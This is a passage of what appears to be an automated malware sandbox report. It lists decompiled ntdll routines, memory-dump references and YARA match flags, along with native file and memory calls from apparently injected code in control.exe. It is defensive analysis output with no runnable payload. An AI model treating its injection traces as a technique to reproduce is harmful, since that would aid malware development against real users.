0x1e30ec0f
0x1e30ec12
0x1e30ec15
0x1e30ec15
0x1e30ec18
0x1e30ec1e
0x00000000
0x00000000
0x1e30ec22
0x1e30ec28
0x1e30ec4b
0x1e30ec5b
0x1e30ec5d
0x1e30ec63
0x1e30ec65
0x1e30ec68
0x1e30ec6b
0x1e30ec6b
0x1e30ec70
0x1e30ec71
0x1e30ec74
0x1e30ec7d
0x00000000
0x1e30ebe3
0x1e30ebe3
0x1e30ebe6
0x1e30ebe6
0x1e30ebe7
0x1e30ebe9
0x1e30ebec
0x00000000
0x1e30ebe6
0x1e30ebe1
0x1e30eba4
0x1e30eba9
0x1e30ebb0
0x1e30ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1e30ebab
0x1e30ebab
0x1e30ebab
0x1e30ebac
0x1e30ebac
0x00000000
0x1e30ebab
0x1e30eb97
0x1e30eb19
0x1e30eb1c
0x1e30eb21
0x1e30eb26
0x1e30eb2c
0x1e30eb2c
0x00000000
0x1e30eb26
0x1e30ead6
0x1e30ead9
0x1e30eadc
0x1e30eadc
0x1e30eadc
0x1e30eade
0x1e30eae4
0x00000000
0x00000000
0x1e30eaee
0x1e30eaf7
0x1e30eaf9
0x00000000
0x00000000
0x1e30eb04
0x1e30eb12
0x00000000
0x1e30eb12
0x1e30eb06
0x00000000
0x1e30eb06
0x1e30eaf0
0x1e30eaf2
0x1e30eaf4
0x00000000
0x1e30eaf4
0x1e30ea6a
0x1e30ea21
0x00000000
0x1e30ea21
0x1e30e9d6
0x1e30e9d6
0x1e30e9e0
0x1e30e9e2
0x1e30e9e2
0x1e30e9e8
0x00000000
0x1e30e9e8
0x1e30e987
0x1e30e98f
0x1e30e992
0x1e30e995
0x1e30e995
0x1e30e998
0x1e30e998
0x1e30e99a
0x1e30e9a0
0x00000000
0x00000000
0x1e30e9a9
0x1e30e9b2
0x1e30e9b4
0x00000000
0x00000000
0x1e30e9ba
0x1e30e9c1
0x1e30e9cf
0x00000000
0x1e30e9cf
0x1e30e9c3
0x00000000
0x1e30e9c3
0x1e30e9ab
0x1e30e9ad
0x1e30e9af
0x00000000
0x1e30e9af
0x1e30e924
0x1e30e8b7
0x1e30e8ba
0x1e30e902
0x1e30e908
0x1e30e90a
0x00000000
0x1e30e90a
0x1e30e8bc
0x1e30e8bf
0x1e30e8f9
0x1e30e8ff
0x1e30e901
0x00000000
0x1e30e901
0x1e30e8c1
0x1e30e8c4
0x1e30e8f0
0x1e30e8f6
0x1e30e8f8
0x00000000
0x1e30e8f8
0x1e30e8c6
0x1e30e8c9
0x1e30e8e7
0x1e30e8ed
0x1e30e8ef
0x00000000
0x1e30e8ef
0x1e30e8cb
0x1e30e8ce
0x1e30e8de
0x1e30e8e4
0x1e30e8e6
0x00000000
0x1e30e8e6
0x1e30e8d3
0x00000000
0x1e30e8d5
0x1e30e8db
0x1e30e8dd
0x00000000
0x1e30e8dd
0x1e30e853
0x1e30e855
0x1e30e85b
0x1e30e85d
0x1e30e897
0x1e30e89c
0x1e30e8a2
0x1e30e8a6
0x1e30e8ab
0x1e30e8ad
0x1e30e8ad
0x00000000
0x1e30e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 1E30EA10
RtlDebugPrintTimes.NTDLL ref: 1E30ED24

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0c8250d61a185f205389fba040565bc560e5eaff1b0885756fe8d9ded9a48d12
Instruction ID: 289a14ab94695f926e3c3d40e13ab68adf973e12b521539e56847b942fd91469
Opcode Fuzzy Hash: 0c8250d61a185f205389fba040565bc560e5eaff1b0885756fe8d9ded9a48d12
Instruction Fuzzy Hash: DC029372F006168BCF18CFAAC9A167EBBF6EF88200755466DE456DB390D734E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E26645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1E26645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e32d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E27FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E252280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E24FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e32b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E27B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1e26645b
0x1e266463
0x1e26646d
0x1e266475
0x1e26647a
0x1e26647e
0x1e266480
0x1e26648c
0x1e266490
0x1e266495
0x1e266498
0x1e26649b
0x1e26649f
0x1e2664a1
0x1e2a7c07
0x1e2a7c09
0x1e2a7c0c
0x00000000
0x1e2664a7
0x1e2664a7
0x1e2664aa
0x1e2a7bf7
0x1e2a7c00
0x00000000
0x1e2a7bf9
0x1e2a7bf9
0x1e2a7bf9
0x1e2664b0
0x1e2664b0
0x1e2664b2
0x1e2664b2
0x1e2664b3
0x1e2664ba
0x1e266553
0x1e26655e
0x1e266566
0x1e26656c
0x1e266575
0x1e26657f
0x1e266585
0x1e266588
0x1e266588
0x1e2664c7
0x1e2664cb
0x1e2664ce
0x1e2664d3
0x1e2664da
0x1e2664e5
0x1e2664ed
0x1e2664f1
0x1e2664f5
0x1e2664f6
0x1e2664fa
0x1e266502
0x1e266503
0x1e266504
0x1e266507
0x1e26651a
0x1e266524
0x1e266524
0x1e266526
0x1e266526
0x1e2664aa
0x1e26652c
0x1e26652d
0x1e26652e
0x1e266539

APIs

RtlDebugPrintTimes.NTDLL ref: 1E26651A

Strings

0, xrefs: 1E2664E5
0, xrefs: 1E2664FA

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: e92bd20de6c110e9d7d6b9f0abb94cfe879cd158a1d6b54f9577ffccb40abf0c
Instruction ID: c7096c0366102c5b09890c13a782d0d76894cff6d627ce5a670ff8fdff247aa4
Opcode Fuzzy Hash: e92bd20de6c110e9d7d6b9f0abb94cfe879cd158a1d6b54f9577ffccb40abf0c
Instruction Fuzzy Hash: 3C416BB56087429FC310CF28C594A1ABBE5BB8D718F144A2EF989DB340D731EA45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1E2CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1E2CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E27CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E2C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E2C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x1e2cfdda
0x1e2cfde2
0x1e2cfde5
0x1e2cfdec
0x1e2cfdfa
0x1e2cfdff
0x1e2cfe0a
0x1e2cfe0f
0x1e2cfe17
0x1e2cfe1e
0x1e2cfe19
0x1e2cfe19
0x1e2cfe19
0x1e2cfe20
0x1e2cfe21
0x1e2cfe22
0x1e2cfe25
0x1e2cfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E2CFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E2CFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E2CFE2B

Memory Dump Source

Source File: 0000000A.00000002.559486083.000000001E210000.00000040.00000001.sdmp, Offset: 1E210000, based on PE: true

Associated: 0000000A.00000002.560152253.000000001E32B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 0a051a628235baa935b8bec33d85dcca18ce93b3b1be601b6258c09c63ef819c
Instruction ID: 5444eb00b2f6822d426c68a68d34fb1ee14179c717c17d325078f5a5711f07b7
Opcode Fuzzy Hash: 0a051a628235baa935b8bec33d85dcca18ce93b3b1be601b6258c09c63ef819c
Instruction Fuzzy Hash: 98F0F63A500141BFE6244A55DC05F63BB5AEB45730F244314F628572E1DA63F8A086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 5548 Parent PID: 3440 control.exeCOMMON

Executed Functions

Function 030B81BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,030B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030B820D

Strings

.z`, xrefs: 030B81FD, 030B8208

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 138226b1480cab03c6d1f91be4098479bded6534b39da9aa6dd0cb633cc9025a
Instruction ID: 16493bd8a1cd2df818ce9dab493f0d45e879d87411a73a560e3cf7fd0428d595
Opcode Fuzzy Hash: 138226b1480cab03c6d1f91be4098479bded6534b39da9aa6dd0cb633cc9025a
Instruction Fuzzy Hash: 8201E8B2206649AFCB08DF98CC85DEB77BDEF8C744F158648FA4997251D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,030B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030B820D

Strings

.z`, xrefs: 030B81FD, 030B8208

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 55d1f47f0167f68d75c17896fb8386b0d2ea0a1887a0c6aec7c639296c245173
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 86F0B2B2201208ABCB08CF88DC84EEB77ADAF8C754F158648FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030B826A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 73960ebcd6f8f067925a34d727c602b3213932f76f8d76c5497beced67e38da7
Instruction ID: e183dd335bf2de154b5ba8df3069428eed3accfa288a1a5d5a599efdac41ad25
Opcode Fuzzy Hash: 73960ebcd6f8f067925a34d727c602b3213932f76f8d76c5497beced67e38da7
Instruction Fuzzy Hash: ECF0E2B6200108ABDB04DF88CC80EEB77AEEF8C354F058648BA1D97250C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: dad3f7c271c48626b3b98f42348168e36ebbd2e8456916e9ad850c4d9454b988
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: FAF0A4B6200208ABCB14DF89DC80EEB77ADEF8C754F158649BA1D97251DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B839A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 2698e6fe84718ad0b50cfb7373a502d7904a37694fdfffe62908dc9c9df2747a
Instruction ID: 7bbd11272f5f649bd028f80c925f215a30ee78bd4d9cb9c05b1b68711cb21919
Opcode Fuzzy Hash: 2698e6fe84718ad0b50cfb7373a502d7904a37694fdfffe62908dc9c9df2747a
Instruction Fuzzy Hash: C4F01CB6210208ABCB14DF89DC80EEB77ADEF88650F158559FE1997251C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 6ec161201bf57febc5393bc4b10f75aa1943a6cb23c6f38a41089bbd6fb15f12
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 3FF015B6200208ABCB14DF89CC80EEB77ADEF88650F118549FE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030B82F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030B3D30,?,?,030B3D30,00000000,FFFFFFFF), ref: 030B8315

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 56f4d9acff00597e659e69f005665512211dd013fc1f55e618cfae60cfb0b199
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 2ED012762003146BD710EF98CC45ED7776CEF44650F154455BA185B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 030B82EA, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030B3D30,?,?,030B3D30,00000000,FFFFFFFF), ref: 030B8315

Memory Dump Source

Source File: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: bec73944cdbbf74bfa31c054bfa55bc5bfc8ec180cb774a9c21162343f73236d
Instruction ID: 3cdc3ab0ea363f1c8c333c88bf0036ffa03dfb3e1324dc16d4e8c59589a79214
Opcode Fuzzy Hash: bec73944cdbbf74bfa31c054bfa55bc5bfc8ec180cb774a9c21162343f73236d
Instruction Fuzzy Hash: C5E0C2B94092C04FD711FF74A8C04C2BF50EE912143158ACED4A80B517D671A605DB90

Uniqueness

Uniqueness Score: -1.00%

Function 048695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048695DA

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94ddf0c75385a3d296374261072693bc4392ed96a92101ca03e3671812454d5c
Instruction ID: 7ec426a3b6c071ac4fd2ba2edb6199d346575db6ea4ffae54eed3bc359139f8f
Opcode Fuzzy Hash: 94ddf0c75385a3d296374261072693bc4392ed96a92101ca03e3671812454d5c
Instruction Fuzzy Hash: 369002A120200003710571594424616444A9BE0245B51C521E200A6A1DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 04869540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486954A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5ff1b72215ef3dce3d483f1c264d67e7f9a36c4f38e5abf34b30e4b1e600d33
Instruction ID: f11903cb25a891864617eb8e98d9d1680ee1dd46f5425c35fc55550901d656aa
Opcode Fuzzy Hash: c5ff1b72215ef3dce3d483f1c264d67e7f9a36c4f38e5abf34b30e4b1e600d33
Instruction Fuzzy Hash: 75900265211000033105A559071450704869BD5395351C521F200B661CD661D8656161

Uniqueness

Uniqueness Score: -1.00%

Function 048696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048696DA

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88ac88085e813dacfbaee245be3c58c69f160a3683242850de5877897089ba45
Instruction ID: 8a4363fb8598812b385560b916bcc49e099cc56c9516faee921cf96dfefb37e2
Opcode Fuzzy Hash: 88ac88085e813dacfbaee245be3c58c69f160a3683242850de5877897089ba45
Instruction Fuzzy Hash: 2890027120100842F10061594414B4604459BE0345F51C516A111A765D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 048696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048696EA

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1121116d0718b51957a7fcf2a5bc2bab9d7b30beaab99b8bc707ecd1814685f2
Instruction ID: 84c29249f041328b1323746a9297c32cfdceedd130da9d65302ac5928e655881
Opcode Fuzzy Hash: 1121116d0718b51957a7fcf2a5bc2bab9d7b30beaab99b8bc707ecd1814685f2
Instruction Fuzzy Hash: 0490027120108802F1106159841474A04459BD0345F55C911A541A769D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 04869650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486965A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98cae6b4c9b2f8acab21b05a08c154a6e9bea97ac2d5e625a7ff43975890ea1f
Instruction ID: 2d75f6bda0d5a4cf671b05b76b27178aae0c9907d32a131b21b6cc149056484e
Opcode Fuzzy Hash: 98cae6b4c9b2f8acab21b05a08c154a6e9bea97ac2d5e625a7ff43975890ea1f
Instruction Fuzzy Hash: C790027120504842F14071594414A4604559BD0349F51C511A105A7A5D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04869660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486966A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36a6a5320f224804a08b38dd83d15cfc8be86c984d301cd965c6b1a440de626f
Instruction ID: 051f73eb86d72a86cf44ffc8705a64d4e9698c10bf83c13ebdd16c5af10d8d6b
Opcode Fuzzy Hash: 36a6a5320f224804a08b38dd83d15cfc8be86c984d301cd965c6b1a440de626f
Instruction Fuzzy Hash: A390027120100802F1807159441464A04459BD1345F91C515A101B765DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04869780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486978A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4632d5c09baa6de05520d40674114849875d5b109a05c0a8f5d1859cb5c4563
Instruction ID: 01fd4a17cc9d6a2f8b184aec1ec1219e31b10556a1fb6e371177e99fcc73ea2a
Opcode Fuzzy Hash: d4632d5c09baa6de05520d40674114849875d5b109a05c0a8f5d1859cb5c4563
Instruction Fuzzy Hash: 8890026921300002F1807159541860A04459BD1246F91D915A100B669CC955D86D6361

Uniqueness

Uniqueness Score: -1.00%

Function 04869FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869FEA

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db1b1e7b3dbfd01bde9a751651092467c13b3140460da781245a5764ee724c0f
Instruction ID: 5f9d488b55615830da48413d9754eab122d9134c45911136dd563676ccb0835e
Opcode Fuzzy Hash: db1b1e7b3dbfd01bde9a751651092467c13b3140460da781245a5764ee724c0f
Instruction Fuzzy Hash: DB90027131114402F1106159841470604459BD1245F51C911A181A669D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 04869710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486971A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3537979cfdd8e7754b4d717c17def60ad99259e961aab478878981296d75d238
Instruction ID: 05f7525d5f6199a037aa031e97483d86cc545b9f820b70def7421ef98b985398
Opcode Fuzzy Hash: 3537979cfdd8e7754b4d717c17def60ad99259e961aab478878981296d75d238
Instruction Fuzzy Hash: 0090027120100402F1006599541864604459BE0345F51D511A601A666EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 04869840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486984A

Memory Dump Source

Source File: 00000017.00000002.593535380.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000017.00000002.593823792.000000000491B000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e54942185958396a8cddf3d24efb4929bfcffe369331509e26692ffb7d0c36c
Instruction ID: f45389f635d27f78a085a02a07b5c1ba0361b1f95112f61915355a3e106072c6
Opcode Fuzzy Hash: 0e54942185958396a8cddf3d24efb4929bfcffe369331509e26692ffb7d0c36c
Instruction Fuzzy Hash: 5E900261242041527545B15944145074446ABE0285791C512A240AA61C8566E85AE661

Uniqueness

Uniqueness Score: -1.00%

Function 04869860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486986A

Memory Dump Source

